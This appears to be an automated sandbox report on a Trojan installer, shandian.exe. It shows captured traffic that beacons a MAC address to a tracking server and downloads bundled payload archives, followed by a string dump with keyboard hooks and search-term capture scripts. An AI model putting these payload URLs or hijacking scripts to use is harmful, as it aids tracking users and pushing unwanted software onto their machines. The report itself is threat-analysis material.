e05c408b45877ca878fc12a27d016568 c:\Program Files\shandian\shandian.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 49152 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 241664 145240 145408 4.71338 3c323dbf8f30feffcb5487397c96eb8f

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack

Traffic

GET /stat/?ac=stat&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: stat.fjmjm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:24 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Who: ShanIE
Set-Cookie: ASPSESSIONIDCASQABDQ=EJOBAFCDHIFHAFHJDHLMNMOC; path=/
Cache-control: private
X-Powered-By-Anquanbao: MISS from uni-zz-dl-if1


GET /F30241_s_0523.rar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Host: down.qicc-md.org
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.3.6
Date: Sun, 29 Jun 2014 01:59:20 GMT
Content-Type: application/octet-stream
Content-Length: 12269032
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
Last-Modified: Sun, 25 May 2014 10:57:46 GMT
Accept-Ranges: bytes
ETag: "071029878cf1:735"

<<< skipped >>>

GET /miniindex/ HTTP/1.1
User-Agent: hello crazyk
Host: VVV.mdtxw.org


HTTP/1.1 200 OK
Content-Length: 10190
Content-Type: text/html
Content-Location: hXXp://VVV.mdtxw.org/miniindex/index.html
Last-Modified: Thu, 10 Apr 2014 18:26:17 GMT
Accept-Ranges: bytes
ETag: "72b0ee5cea54cf1:43f"
Server: Microsoft-IIS/6.0
Who: ShanIE
Date: Sun, 29 Jun 2014 01:59:47 GMT

<<< skipped >>>

GET /miniindex/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: VVV.mdtxw.org
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 10190
Content-Type: text/html
Content-Location: hXXp://VVV.mdtxw.org/miniindex/index.html
Last-Modified: Thu, 10 Apr 2014 18:26:17 GMT
Accept-Ranges: bytes
ETag: "72b0ee5cea54cf1:43f"
Server: Microsoft-IIS/6.0
Who: ShanIE
Date: Sun, 29 Jun 2014 01:59:48 GMT

<<< skipped >>>

GET /miniindex/tj.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mdtxw.org/miniindex/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: VVV.mdtxw.org
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 279
Content-Type: application/x-javascript
Last-Modified: Thu, 10 Apr 2014 18:44:12 GMT
Accept-Ranges: bytes
ETag: "191fdfddec54cf1:43f"
Server: Microsoft-IIS/6.0
Who: ShanIE
Date: Sun, 29 Jun 2014 01:59:48 GMT
var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " hXXp://");document.write(unescape(""));..


GET /F30241_s_0523.rar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Host: down.qicc-md.org
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.3.6
Date: Sun, 29 Jun 2014 01:59:19 GMT
Content-Type: application/octet-stream
Content-Length: 12269032
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
Last-Modified: Sun, 25 May 2014 10:57:46 GMT
Accept-Ranges: bytes
ETag: "071029878cf1:735"

<<< skipped >>>

GET /miniindex/inc/stylemini.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mdtxw.org/miniindex/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: VVV.mdtxw.org
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 11323
Content-Type: text/css
Last-Modified: Thu, 10 Apr 2014 18:35:54 GMT
Accept-Ranges: bytes
ETag: "e34f8b4eb54cf1:43f"
Server: Microsoft-IIS/6.0
Who: ShanIE
Date: Sun, 29 Jun 2014 01:59:48 GMT

<<< skipped >>>

GET /miniindex/inc/jquery-1.7.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mdtxw.org/miniindex/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: VVV.mdtxw.org
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 91342
Content-Type: application/x-javascript
Last-Modified: Thu, 10 Apr 2014 16:44:11 GMT
Accept-Ranges: bytes
ETag: "80ff3c19dc54cf1:43f"
Server: Microsoft-IIS/6.0
Who: ShanIE
Date: Sun, 29 Jun 2014 01:59:48 GMT

<<< skipped >>>

GET /web/welcome_cn.htm?ver=2.4.1.9&guid=a64f77031449b9089cdde8cb20ce31cb68f4c3c5f08e420ebe5bab809d8443091403989454&lastver= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)
Host: VVV.fjmjm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:42 GMT
Content-Type: text/html
Content-Length: 1469
Connection: keep-alive
Last-Modified: Thu, 17 Apr 2014 15:55:27 GMT
Accept-Ranges: bytes
ETag: "80414a73555acf1:43f"
Who: ShanIE
X-Powered-By-Anquanbao: MISS from uni-zz-gw-sb4

<<< skipped >>>

GET /web/newioage.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a64f77031449b9089cdde8cb20ce31cb68f4c3c5f08e420ebe5bab809d8443091403989454&lastver=
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)
Host: VVV.fjmjm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:44 GMT
Content-Type: text/css
Content-Length: 715
Connection: keep-alive
Last-Modified: Thu, 17 Apr 2014 15:40:05 GMT
Accept-Ranges: bytes
ETag: "8038bc4d535acf1:43f"
Who: ShanIE
X-Powered-By-Anquanbao: MISS from uni-zz-gw-sb4


GET /stat/?v=1&ac=setup&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Host: stat.fjmjm.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDCASQABDQ=EIOBAFCDLBCINGLMGINNPAIH


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:17 GMT
Content-Type: text/html
Content-Length: 2997
Connection: keep-alive
Who: ShanIE
Cache-control: private
X-Powered-By-Anquanbao: MISS from uni-zz-dl-if1
[ShortCut_1]
Desc=360..........
Hint=360..........
Name=360..........
URL=hXXp://VVV.jlbnh.com
Icon=ico\360.ico
[ShortCut_2]
Desc=Internet Explorer
Hint=Internet Explorer
Name=Internet Explorer
URL=hXXp://VVV.jlbnh.com
Icon=ico\ie.ico
[SoftWare_1]
Desc=........
Hint=........
Name=F30241_s_0523
URL=hXXp://down.qicc-md.org/F30241_s_0523.rar
reg=HKLM\SOFTWARE\Baidu\BaiduSd\InstallDir
[SoftWare_2]
Desc=........
Hint=........
Name=ionrkf_70688
URL=hXXp://down.qicc-md.org/ionrkf_70688.rar
reg=HKLM\SOFTWARE\Baidu\BaiduAn\InstallDir
[SoftWare_3]
Desc=....
Hint=....
Name=dudu_b_55045
URL=hXXp://down.qicc-md.org/dudu_b_55045.rar
reg=HKCU\Software\Kuping\InstallPath
[SoftWare_4]
Desc=........
Hint=........
Name=pczh_98_2
URL=hXXp://down.qicc-md.org/pczh_98_2.rar
reg=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Ainqngz3.9.exe\
[SoftWare_5]
Desc=......
Hint=......
Name=-8853_1_mvy
URL=hXXp://down.qicc-md.org/-8853_1_mvy.rar
reg=HKLM\SOFTWARE\Mnying\Mnyingfiledir
[SoftWare_6]
Desc=...... 
Hint=......
Name=yxku_s[106]
URL=hXXp://down.qicc-md.org/yxku_s[106].rar
reg=HKCU\Software\yxkuBox\InstallPath
[SoftWare_7]
Desc=....
Hint=....
Name=xkss_50041
URL=hXXp://down.qicc-md.org/xkss_50041.rar
reg=HKCU\Software\xuankusoso\InstallMode
[SoftWare_9]
Desc=....FM
Hint=....FM
Name=setup_3128
URL=hXXp://down.qicc-md.org/setup_3128.rar
reg=HKLM\SOFTWARE\YYMusic3\rd
[SoftWare_11]
Desc=........
Hint=........
Name=BaiduPlayerNetSetup_284
URL=hXXp://down.qicc-md.org/B

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)
Host: VVV.jlbnh.com
Connection: Keep-Alive


HTTP/1.1 302 Redirect
Server: nginx/1.4.3.6
Date: Sun, 29 Jun 2014 01:59:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
Location: hXXp://123.sogou.com/?22014
Who: ShanIE
96..<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://123.sogou.com/?22014">here</a></body>..0..


GET /stat/?v=1&ac=setup&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Host: stat.fjmjm.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:16 GMT
Content-Type: text/html
Content-Length: 2997
Connection: keep-alive
Who: ShanIE
Set-Cookie: ASPSESSIONIDCASQABDQ=EIOBAFCDLBCINGLMGINNPAIH; path=/
Cache-control: private
X-Powered-By-Anquanbao: MISS from uni-zz-dl-if1

<<< skipped >>>

GET /?22014 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)
Host: 123.sogou.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 Jun 2014 01:59:42 GMT
Content-Type: text/html; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM CNT PRELOC"
Content-Encoding: gzip

<<< skipped >>>

GET /web/PopWinParam.asp?d=2014419&mainver=1.0.0&popver=1.0.0&xmlver=20131020010000 HTTP/1.1
User-Agent: Crazyk
Host: stat.fjmjm.com
Cookie: ASPSESSIONIDCASQABDQ=AKOBAFCDMKABOGNAKJHLOMKG


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:33 GMT
Content-Type: text/html
Content-Length: 4659
Connection: keep-alive
Who: ShanIE
Cache-control: private
X-Powered-By-Anquanbao: MISS from uni-zz-dl-if1
<?xml version="1.0" encoding="gb2312"?>
<SoftwareConfig>
  <Version>20140629095933</Version>
  <Popwin>
    <Item id="1">
      <Subject>........</Subject>
      <WinWidth>708</WinWidth>
      <WinHeight>404</WinHeight>
      <StartUpPosition>0</StartUpPosition>
      <URL>hXXp://VVV.mdtxw.org/miniindex/</URL>
      <StartUpTime>10</StartUpTime>
      <ShowInteval>7200</ShowInteval>
      <AutoClose>600</AutoClose>
      <isShow>1</isShow>
    </Item>
    <Item id="2">
      <Subject>........</Subject>
      <WinWidth>300</WinWidth>
      <WinHeight>265</WinHeight>
      <StartUpPosition>1</StartUpPosition>
      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140629095933</URL>
      <StartUpTime>50</StartUpTime>
      <ShowInteval>0</ShowInteval>
      <AutoClose>50</AutoClose>
      <isShow>1</isShow>
    </Item>
    <Item id="3">
      <Subject>....LB</Subject>
      <WinWidth>300</WinWidth>
      <WinHeight>265</WinHeight>
      <StartUpPosition>1</StartUpPosition>
      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140629095933</URL>
      <StartUpTime>200</StartUpTime>
      <ShowInteval>7200</ShowInteval>
      <AutoC

<<< skipped >>>

GET /web/PopWinParam.asp?d=2014419&mainver=1.0.0&popver=1.0.0&xmlver=20131020010000 HTTP/1.1
User-Agent: hello crazyk
Host: stat.fjmjm.com


HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Sun, 29 Jun 2014 01:59:32 GMT
Content-Type: text/html
Content-Length: 4659
Connection: keep-alive
Who: ShanIE
Set-Cookie: ASPSESSIONIDCASQABDQ=AKOBAFCDMKABOGNAKJHLOMKG; path=/
Cache-control: private
X-Powered-By-Anquanbao: MISS from uni-zz-dl-if1
<?xml version="1.0" encoding="gb2312"?>
<SoftwareConfig>
  <Version>20140629095932</Version>
  <Popwin>
    <Item id="1">
      <Subject>........</Subject>
      <WinWidth>708</WinWidth>
      <WinHeight>404</WinHeight>
      <StartUpPosition>0</StartUpPosition>
      <URL>hXXp://VVV.mdtxw.org/miniindex/</URL>
      <StartUpTime>10</StartUpTime>
      <ShowInteval>7200</ShowInteval>
      <AutoClose>600</AutoClose>
      <isShow>1</isShow>
    </Item>
    <Item id="2">
      <Subject>........</Subject>
      <WinWidth>300</WinWidth>
      <WinHeight>265</WinHeight>
      <StartUpPosition>1</StartUpPosition>
      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140629095932</URL>
      <StartUpTime>50</StartUpTime>
      <ShowInteval>0</ShowInteval>
      <AutoClose>50</AutoClose>
      <isShow>1</isShow>
    </Item>
    <Item id="3">
      <Subject>....LB</Subject>
      <WinWidth>300</WinWidth>
      <WinHeight>265</WinHeight>
      <StartUpPosition>1</StartUpPosition>
      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140629095932</URL>
      <StartUpTime>200</StartUpTime>
      <ShowInteval>7200</ShowInteval>
      <AutoC

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_2644:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\bind.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\bind.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp
   
nslB3.tmp
0, 0, 0)
S~1\Temp\nslB3.tmp
%original file name%.exe
c:\%original file name%.exe
%Program Files%\shandian"
%Program Files%\shandian
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsbB2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v2.45
%Documents and Settings%\%current user%\Start Menu\Programs\

%original file name%.exe_2644_rwx_10004000_00001000:

callback%d

shandian.exe_2548:

.text
`.rdata
@.data
.rsrc
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
<4,$?7/'
(3-!0,1'8"5.*2$
inflate 1.2.3 Copyright 1995-2005 Mark Adler
WINMM.dll
WS2_32.dll
IMM32.dll
VERSION.dll
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
GetKeyState
GetAsyncKeyState
EnumThreadWindows
EnumWindows
keybd_event
MapVirtualKeyW
EnumChildWindows
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyboardLayoutNameW
LoadKeyboardLayoutW
GetKeyNameTextW
RegisterHotKey
UnregisterHotKey
USER32.dll
GDI32.dll
comdlg32.dll
RegCloseKey
RegOpenKeyW
RegCreateKeyW
RegDeleteKeyW
RegOpenKeyExW
RegGetKeySecurity
RegEnumKeyW
RegQueryInfoKeyW
RegSetKeySecurity
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteExW
ShellExecuteW
SHFileOperationW
SHELL32.dll
ole32.dll
OLEAUT32.dll
CreateUrlCacheEntryW
CommitUrlCacheEntryW
GetUrlCacheEntryInfoW
InternetCrackUrlW
DeleteUrlCacheEntryW
HttpOpenRequestA
CommitUrlCacheEntryA
HttpAddRequestHeadersA
DeleteUrlCacheEntryA
FindCloseUrlCache
FindNextUrlCacheEntryA
UnlockUrlCacheEntryFileA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryW
UnlockUrlCacheEntryFileW
FindFirstUrlCacheEntryW
InternetCanonicalizeUrlW
FtpCommandW
FtpOpenFileW
HttpEndRequestW
HttpSendRequestExW
HttpOpenRequestW
FtpGetFileSize
HttpQueryInfoW
WININET.dll
DSOUND.dll
UrlCombineW
UrlIsOpaqueW
PathIsURLW
UrlGetPartW
SHDeleteKeyW
UrlCanonicalizeW
SHEnumKeyExW
UrlIsW
SHQueryInfoKeyW
SHLWAPI.dll
MSVCRT.dll
_acmdln
CoInternetCombineUrl
CoGetClassObjectFromURL
urlmon.dll
NETAPI32.dll
gdiplus.dll
WINTRUST.dll
COMCTL32.dll
URL=%s
_twpass
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
cmdline
@%s#%s
%s%s; %s)
Referer: %s
msjava.dll
\msjava.dll
/uploaderapi2.swf
1.2.3
http://%s%s
HTTP/1.0
Mozilla/4.0
www1.baidu.com
www.baidu.com
baidu.com
.jpeg
\\.\PhysicalDrive%d
\\.\Scsi%d:
XXXXXX
ADD_DATE="%s"
LOVEFAV="%d"
LAST_MODIFIED="%s"
LAST_VISIT="%s"
%s=%s
%s=%s HTTPS=%s
0d
error %d with zipfile in unzCloseCurrentFile
error %d with zipfile in unzReadCurrentFile
extracting: %s
error opening %s
%s%s/
The file %s exists. Overwrite ? [y]es, [n]o, [A]ll:
error %d with zipfile in unzOpenCurrentFilePassword
creating directory: %s
error %d with zipfile in unzGetCurrentFileInfo
error %d with zipfile in unzGoToNextFile
error %d with zipfile in unzGetGlobalInfo
.html
.htm0
http:
NUL=%s
DIRNUL=%s
wininit.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)
00000000000000000001
00000000000000000010
http= HTTPS=
var twFloatTimer%%s;
var twFloatEle%%s;
var twFloatEf%%s = "%ï";
function TWFloatFilterHide%%s( )
if( twFloatEf%%s == "0" )
twFloatEle%%s.removeNode( true );
if( twFloatEle%%s.filters.alpha.opacity > 30 )
twFloatEle%%s.filters.alpha.opacity-=30;
twFloatTimer%%s=window.setTimeout( "TWFloatFilterHide%%s()",100);
window.clearTimeout(twFloatTimer%%s);
twFloatEle%%s.filter="";
twFloatEle%%s.posWidth
twFloatEle%%s.posHeight
twFloatEle%%s.posLeft
twFloatEle%%s.posTop
twFloatEle%%s = document.getElementById( "%%id" );
if( twFloatEf%%s == "1" )
twFloatEle%%s.style.filter="Alpha(Opacity=100, FinishOpacity=0, Style=3)";
K0=http://*.google.c*/search?*q=*
S0=try{col=document.getElementsByName('q');external.SetSearchKey( %max_security_id,col[0].value );}catch (e) {}
K1=http://*.baidu.com/*?*=*
S1=try{col=document.getElementsByName('wd');var str;if( col.length )str= col[0].value;else{col=document.getElementsByName('word');if( col.length ){str
= col[0].value;}}if( str.length != 0 ){external.SetSearchKey( %max_security_id,col[0].value );}}
K2=http://search.live.com/*?q=*
S2=try{col=document.getElementsByName('q');external.SetSearchKey( %max_security_id,col[0].value );}catch (e) {}
SearchLeftPad=7
AdressLeftPad=8
this.isSel = false;
this.bg = this.create('div', '', {}, {'display': 'none', 'zoom': '1', 'filter': 'alpha(opacity=20)', 'backgroundColor': '#000000', 'position': 'absolute', 'zIndex': '998', 'textAlign': 'center', 'width': '100%', 'height': window.screen.availHeight   'px', 'left': '0px', 'top': parseInt(this.$dom.body.parentNode.scrollTop || 0, 10)   'px', 'margin': '0'});
this.pane = this.create('div', '', {'id': 'TW_Plugin_Vest_Pane'}, {'display': 'none', 'backgroundColor': '#FFFFFF', 'padding': '0', 'position': 'absolute', 'zIndex': '999', 'textAlign': 'left'});
this.$dom.body.appendChild(this.bg), this.$dom.body.appendChild(this.pane);
__$Effect.prototype = {
this.pane.innerHTML = '', this.pane.appendChild(b);
var el = this.$dom.createElement(tag);
for (var a in sty || {}) el.style[a] = sty[a];
txt && (el.innerHTML = txt), c && (el.onclick = c);
this.bg.style.display = 'none', this.pane.style.display = 'none', this.$dom.body.style.overflow = this.$dom.body.parentNode.style.overflow = '';
this.$dom.body.onselectstart = this.selEv || null;
setTimeout(function () {for(var i = 0; i < _tag('select').length; i   ) _tag('select')[i].style.visibility = 'visible';}, 1);
document.body.onkeypress = function () {
if(event.keyCode == 13)
URL_Openall();
document.body.scrollTop = 0;
return event.keyCode != 13;
fx && (this.fade(0, this.bg), this.fade(0), this.opacity = 0);
this.bg.style.display = '' , this.pane.style.display = '';
This.selEv = This.$dom.body.onselectstart, This.$dom.body.onselectstart = function() {return This.isSel;};
This.$dom.body.style.overflow = This.$dom.body.parentNode.style.overflow = 'hidden';
for(var i = 0; i < _tag('select').length; i   ) _tag('select')[i].style.visibility = 'hidden';
fx && (This.timer = window.setInterval(function () {
This.fade((This.opacity  = 10) / 100, This.bg);
if(This.opacity >= 20) {
clearInterval(This.timer);
This.fade(0.2, This.bg);
This.fade(0.99);
}, 100));
e = e || this.pane;
e.style.zoom = '1', e.style.filter = 'alpha(opacity='   parseInt(v >= 1 ? '99' : v * 100)   ')';
l && (this.pane.style.left = l   'px'), t && (this.pane.style.top = t   'px'), l == 0 && (this.pane.style.left = '0px'), t == 0 && (this.pane.style.top = '0px');
return (e || document).getElementsByTagName(t);
.white:link {font-size:12px;text-decoration:none;color: #eff8fb}
.white:visited {font-size:12px;text-decoration:none;color: #eff8fb}
.white:active {font-size:12px;text-decoration: none;color: #033B7D}
.white:hover {font-size:12px;text-decoration:none;color: #FF5A00}GIF89a6
A.cb:link {
A.cb:visited {
A.cb:active {
A.cb:hover {
.tlb {
.bb {
.bl {
background:url(callapse.gif) 90% 50% no-repeat;
background:url(callapse_hover.gif) 90% 50% no-repeat;
background:url(expand.gif) 90% 50% no-repeat;
background:url(expand_hover.gif) 90% 50% no-repeat;
var securityId = external.twGetSecurityID(window);
surl = "http://www.google.cn/search?client=aff-worldbrowser&channel=errorpage&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q="   encodeURI( searchtext.value );
window.open( surl );
surl = "http://www.baidu.com/baidu?word=" searchtext.value "&tn=ichuner_4_pg";
surl = "http://www.sogou.com/sogou?query=" searchtext.value "&pid=sogou-addr-6311b2f8bde6a1c3";
Function RequestQueryString( url, ArgName )
= trim(url)
If url = "" Or IsNull(url) Then
If IsObject(parent.location) Then
url = parent.location.href
url = location.href
url = location
nPos = InStr( LCase(url), LCase(ArgName) )
tmpArgVal = right( url, len(url)-nPos 1 )
If InStr( url, "?" ) > 0 Then
ArrTmp = split( url, "?" )
if err.number <> 0 then
err.clear
strUrl = RequestQueryString( url, "url" )
strDomain = RequestQueryString( url, "domain" )
strErrName = RequestQueryString( url, "code" )
document.getElementById("googleSE").value = _neSearchEngine.google;
document.getElementById("baiduSE").value = _neSearchEngine.baidu;
var news = document.getElementById('news');
var frame = document.getElementById("newsFrame");
frame.src = "http://www.fjmjm.com/web/frame_naverror.html";
news.style.display='block';
el.className='a_e';
external.SetOptionValue(securityId,"option","ep_related","1");
news.style.display='none';
el.className='a_c';
external.SetOptionValue(securityId,"option","ep_related","0");
if(document.getElementById("news").currentStyle.display == "block")
this.setDisplay(false,el);
this.setDisplay(true,el);
var defValue = external.GetOptionValue(securityId,"option","ep_related");
this.setDisplay(true,document.getElementById("displayCtrl"));
window.attachEvent("onload",function(){
DisplayMgr.init();
.in1{width: 220px;}
return window.external.twGetFormByIndex( window, "", nIndex );
formName = window.external.twGetFormDataInfo( window, "", formID, dataName );
window.external.twSetFormDataInfo( window, "", formID, "tw_formName", formName );
window.external.twUnInitFormData( window, "", 0 );
pObj = window.event.srcElement;
pObj.style.color=_tabhottextcolor;
pObj.style.color=_tabtextcolor;
oTr = pObj.parentElement.parentElement.parentElement;
oTb = oTr.parentElement.parentElement;
formID = oTr.getAttribute( "tw_formID" );
window.external.twDeleteFormData( window, "", formID );
TalComForm.deleteRow(oTr.rowIndex);
window.location.reload();
oTr = pObj.parentElement.parentElement;
TalUserForm.deleteRow(oTr.rowIndex);
if( moreInfo.style.display == "none" ){
moreInfo.style.display = "";
moreImg.src="more2.gif";
moreInfo.style.display = "none";
moreImg.src="more1.gif";
colInput = formdatatable.getElementsByTagName("input");
nCount = colInput.length;
if( colInput[i].type != "button" )
colInput[i].value = "";
oTr = _oLastSel.parentElement;
if(formID.indexOf("twcommon_")!=-1){
window.external.twFormSave( window, "", formID );
formName = tw_formName.value;
formName = userformName.innerText;
oTr.cells[1].innerText = formName;
oTr = pObj.parentElement;
comDiv.style.display = "";
userDiv.style.display = "none";
tw_formName.value = formName;
window.external.twFormLoad( window, "", formID );
comDiv.style.display = "none";
userDiv.style.display = "";
var oTr = oTb.insertRow( -1 );
var oTd = oTr.insertCell( 0 );
var oTd1 = oTr.insertCell( 1 );
oTr.height = "32px";
oTd.width = "24";
oTd.style.cursor="pointer";
oTd.onclick=OnDeleteItem;
oTd.innerHTML = "
";
oTd1.style.cursor="pointer";
oTd1.onmouseleave=OnLeaveItem;
oTd1.onmouseenter=OnEnterItem;
oTd1.onclick=OnSelectCommonItem;
oTd1.style.color=_tabtextcolor;
oTd1.noWrap = true;
oTd1.innerText=formName;
oTr.setAttribute( "tw_formID", formID );
window.external.twAddComFormData( window, "" );
var nCount = _vCommonData.length;
SelectCommonItem( TalComForm.rows[nCount-1].cells[1] );
if( _oLastSel.parentElement != null )
_oLastSel.parentElement.bgColor = _tabItemDefColor;
_oLastSel.style.fontWeight = "normal";
_oLastSel.style.color = _tabtextcolor;
pObj.parentElement.bgColor = _tabItemSelColor;
pObj.style.fontWeight = "bold";
pObj.style.color = _tabSeltextcolor;
nCount = oTab.rows.length;
oTab.deleteRow(0);
formName = tw_getFormDataInfo( _vCommonData[i].id, "tw_formName" );
OnAddForm(TalComForm, formName, _vCommonData[i].id );
var nCount = _vUserData.length;
var oTr = TalUserForm.insertRow( -1 );
